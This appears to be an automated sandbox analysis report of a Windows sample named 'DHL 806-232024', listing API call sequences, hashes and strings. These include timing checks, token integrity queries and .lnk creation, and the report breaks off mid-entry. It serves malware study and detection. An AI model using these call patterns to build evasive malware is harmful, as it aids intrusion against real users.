                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 842720411-0
                                                                                  • Opcode ID: c8f010614bf6b050622d2d470751e0c08dc9e0d8804498f319a339ee4cbb0eb5
                                                                                  • Instruction ID: 0c856279265d5e97c7a724ac666efdd0993f001b4102fbe3014535700ba40b9b
                                                                                  • Opcode Fuzzy Hash: c8f010614bf6b050622d2d470751e0c08dc9e0d8804498f319a339ee4cbb0eb5
                                                                                  • Instruction Fuzzy Hash: 01014B71216618FFDB204FA6EC98D6B7BACEF893667200469F849C3260DA318C10DB60
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00935502
                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00935510
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00935518
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00935522
                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                  • String ID:
                                                                                  • API String ID: 2833360925-0
                                                                                  • Opcode ID: 9f43b760cafdd61ec01b90425535c07740283fe0eb5f33ed82f72bd14e8cfa7f
                                                                                  • Instruction ID: 95e65d9bbfb4b25fe31eb3872604ce5740f7a14b0983512fae9eab13da7ba96a
                                                                                  • Opcode Fuzzy Hash: 9f43b760cafdd61ec01b90425535c07740283fe0eb5f33ed82f72bd14e8cfa7f
                                                                                  • Instruction Fuzzy Hash: C9015E71C19A19DBCF00EFE5E8585EDBB78FB0D712F020456E401B2140DB305554DBA1
                                                                                  APIs
                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?,?,0092799D), ref: 0092766F
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 0092768A
                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 00927698
                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?), ref: 009276A8
                                                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 009276B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 3897988419-0
                                                                                  • Opcode ID: 14a9cf5059475a5e716343ee24b64ade103a9c8170b815f024db31cdb20dd00d
                                                                                  • Instruction ID: fedccec81b449809786acff6c32221e1c22bbe22971f8f120d891d07f60ba332
                                                                                  • Opcode Fuzzy Hash: 14a9cf5059475a5e716343ee24b64ade103a9c8170b815f024db31cdb20dd00d
                                                                                  • Instruction Fuzzy Hash: 4C01A772615728BFDB105F99EC44BAABFADEF44762F140028FD05E2215E731DD4197A0
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00928608
                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00928612
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00928621
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00928628
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092863E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: 5817edd58c4884742b4fa9d00378d1bce4198649da8773cbd95135f317c073b3
                                                                                  • Instruction ID: e2127bf4cc6c6c0428a8b8acfaa1e5207c56c74c43c3eff09b043668406dc5b3
                                                                                  • Opcode Fuzzy Hash: 5817edd58c4884742b4fa9d00378d1bce4198649da8773cbd95135f317c073b3
                                                                                  • Instruction Fuzzy Hash: E1F06235216315AFEB200FA6EC9DE6B3BACEF89765B040425F945C7190CB719C45EB60
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00928669
                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00928673
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00928682
                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00928689
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092869F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: 98671c837ea9412634b5de6ebc08ff5c8f8a94b4e66df23c95ac799cc4dbac04
                                                                                  • Instruction ID: 19559e1e1b9d30e0d8b075a75f4063339466edc0659579da4373ef3dac91b0bc
                                                                                  • Opcode Fuzzy Hash: 98671c837ea9412634b5de6ebc08ff5c8f8a94b4e66df23c95ac799cc4dbac04
                                                                                  • Instruction Fuzzy Hash: D3F0AF70216314BFEB111FA6EC98E6B3BADEF89766B140025F905C2190CA709800EB60
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0092C6BA
                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0092C6D1
                                                                                  • MessageBeep.USER32(00000000), ref: 0092C6E9
                                                                                  • KillTimer.USER32(?,0000040A), ref: 0092C705
                                                                                  • EndDialog.USER32(?,00000001), ref: 0092C71F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3741023627-0
                                                                                  • Opcode ID: a9de9b18f5f0763fe28fd16b5953eb0b757a17b30e102c4d33bdb12a6b13cd49
                                                                                  • Instruction ID: 6209bc716fb74fef9d34b75ad8e35312451d0b99d7fde3917401de36871c4268
                                                                                  • Opcode Fuzzy Hash: a9de9b18f5f0763fe28fd16b5953eb0b757a17b30e102c4d33bdb12a6b13cd49
                                                                                  • Instruction Fuzzy Hash: 6F01D670415718ABEB206B21EC6EF9A77BCFF00702F000669F542A10E0EBF4A9549F81
                                                                                  APIs
                                                                                  • EndPath.GDI32(?), ref: 008D13BF
                                                                                  • StrokeAndFillPath.GDI32(?,?,0090BAD8,00000000,?), ref: 008D13DB
                                                                                  • SelectObject.GDI32(?,00000000), ref: 008D13EE
                                                                                  • DeleteObject.GDI32 ref: 008D1401
                                                                                  • StrokePath.GDI32(?), ref: 008D141C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2625713937-0
                                                                                  • Opcode ID: 90f70813f158ef4969b174e3a726d34c04780daa5e2422ce393263d09fb2a2e7
                                                                                  • Instruction ID: f4383737da5a959f786a61ed16d086150cb73bf84ff2831bae0fde9de216f0ed
                                                                                  • Opcode Fuzzy Hash: 90f70813f158ef4969b174e3a726d34c04780daa5e2422ce393263d09fb2a2e7
                                                                                  • Instruction Fuzzy Hash: C3F0B230028708ABDB155F2BEC0C7587FA6FB01326F088326E429856F1C7358995EF54
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0093C69D
                                                                                  • CoCreateInstance.OLE32(00962D6C,00000000,00000001,00962BDC,?), ref: 0093C6B5
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                  • CoUninitialize.OLE32 ref: 0093C922
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 2683427295-24824748
                                                                                  • Opcode ID: c183869bf01e628d53fddb1bb3dea66ff7dbebbc53e7adbfbb688c81145e4de8
                                                                                  • Instruction ID: 79cb01a6314df2ef4113d0bc52e0dde0c2c1b7682f931b0787a213b35e054db3
                                                                                  • Opcode Fuzzy Hash: c183869bf01e628d53fddb1bb3dea66ff7dbebbc53e7adbfbb688c81145e4de8
                                                                                  • Instruction Fuzzy Hash: EAA12C71108215AFD700EF58C891EABB7E8FF94714F004A5DF196D7292EB70EA49CB52
                                                                                  APIs
                                                                                    • Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
                                                                                    • Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 008D7BB1: _memmove.LIBCMT ref: 008D7C0B
                                                                                  • __swprintf.LIBCMT ref: 008E302D
                                                                                  Strings
                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008E2EC6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                  • API String ID: 1943609520-557222456
                                                                                  • Opcode ID: 54cca51e82586c8bb298be43d3eb6aae0dd51fcb742188773f5b0b78619c707c
                                                                                  • Instruction ID: e444406973f21fd42a5bc7823f2fe5c1457321e3b3f5d9a45097c229f4cec1ff
                                                                                  • Opcode Fuzzy Hash: 54cca51e82586c8bb298be43d3eb6aae0dd51fcb742188773f5b0b78619c707c
                                                                                  • Instruction Fuzzy Hash: 24917D71508745AFC728EF28D985C6EB7A8FF86750F00491EF581D73A1EA20EE45CB52
                                                                                  APIs
                                                                                    • Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE
                                                                                  • CoInitialize.OLE32(00000000), ref: 0093BC26
                                                                                  • CoCreateInstance.OLE32(00962D6C,00000000,00000001,00962BDC,?), ref: 0093BC3F
                                                                                  • CoUninitialize.OLE32 ref: 0093BC5C
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 2126378814-24824748
                                                                                  • Opcode ID: 7a3c03c359676ff25b0f61f75224edc231ff7d9314a53d80b714816a0bfff6b9
                                                                                  • Instruction ID: 41117454846bbb18e5527c140555caac12c3e834306682a75f90d078901df7be
                                                                                  • Opcode Fuzzy Hash: 7a3c03c359676ff25b0f61f75224edc231ff7d9314a53d80b714816a0bfff6b9
                                                                                  • Instruction Fuzzy Hash: BFA13575204311AFCB10DF18C494E5ABBE5FF88314F148A99F99A9B3A1CB31ED45CB92
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 008F52DD
                                                                                    • Part of subcall function 00900340: __87except.LIBCMT ref: 0090037B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__87except__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 2905807303-2276729525
                                                                                  • Opcode ID: f309da572b73b6ac79f201d41379313cdda6c2d191489e32d82c25b5d7fdd56d
                                                                                  • Instruction ID: cd25ca473e2b7983e9e9fd4447f9e398b53b2a29a8ae4be0f861c58709b38fc9
                                                                                  • Opcode Fuzzy Hash: f309da572b73b6ac79f201d41379313cdda6c2d191489e32d82c25b5d7fdd56d
                                                                                  • Instruction Fuzzy Hash: A7516B21A1CA098BCB117738C95137E7B94FB81754F204E59E3D5C23E9EE788CD4AA4A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #$+
                                                                                  • API String ID: 0-2552117581
                                                                                  • Opcode ID: 42854e42d7c37e1214e4e582f3c47e5d644a3a8220471d5bad310f10df51263b
                                                                                  • Instruction ID: 3c484206fdc5efc77a020d57f8248aabcb142ba28fafd73fa35123af30586ff0
                                                                                  • Opcode Fuzzy Hash: 42854e42d7c37e1214e4e582f3c47e5d644a3a8220471d5bad310f10df51263b
                                                                                  • Instruction Fuzzy Hash: AB51317510426ACFCF259F28E8886FA7BA8FF15310F184056E8919B3E5D7349C42CB61
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_memmove
                                                                                  • String ID: ERCP
                                                                                  • API String ID: 2532777613-1384759551
                                                                                  • Opcode ID: 5c5fb3e91bd97406be946d1fb2e31b5a907c0740f443c1d44fd1164a0928c5b8
                                                                                  • Instruction ID: 415b10acdff143a84746cf73f96ee342bda53662045e39944b6076ceaa22d3fe
                                                                                  • Opcode Fuzzy Hash: 5c5fb3e91bd97406be946d1fb2e31b5a907c0740f443c1d44fd1164a0928c5b8
                                                                                  • Instruction Fuzzy Hash: B451B171900759DBCB24CF65C8817AABBF4FF14358F20856EE94ACB281F771A5A0CB45
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0095F910,00000000,?,?,?,?), ref: 00957C4E
                                                                                  • GetWindowLongW.USER32 ref: 00957C6B
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00957C7B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long
                                                                                  • String ID: SysTreeView32
                                                                                  • API String ID: 847901565-1698111956
                                                                                  • Opcode ID: 5d6204ead54346e0c6d63bdf7a492d1f1b33d6f029cb0f6d538edda44d1dab61
                                                                                  • Instruction ID: 20165358eec5a9520996a2c105f03a8bce3ebb552ff23e9654ea085448b7d3ad
                                                                                  • Opcode Fuzzy Hash: 5d6204ead54346e0c6d63bdf7a492d1f1b33d6f029cb0f6d538edda44d1dab61
                                                                                  • Instruction Fuzzy Hash: 1531ED31204206AADB118F79DC05BEAB7A9EF44335F244725FCB5D32E0C730E9549B50
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009576D0
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009576E4
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00957708
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: SysMonthCal32
                                                                                  • API String ID: 2326795674-1439706946
                                                                                  • Opcode ID: ba78da16905792386daccdbe642801199c71156d84d9f919879b45ab4c6238b9
                                                                                  • Instruction ID: d8ea52db55cc0bfb9b443ea8c6986a503507d9acc1f26e16da86a86d7e3527a2
                                                                                  • Opcode Fuzzy Hash: ba78da16905792386daccdbe642801199c71156d84d9f919879b45ab4c6238b9
                                                                                  • Instruction Fuzzy Hash: 4B21E232514219BBDF11CFA5DC46FEB3B79EF88724F110214FE15AB1D0D6B1A8549BA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00956FAA
                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00956FBA
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00956FDF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$MoveWindow
                                                                                  • String ID: Listbox
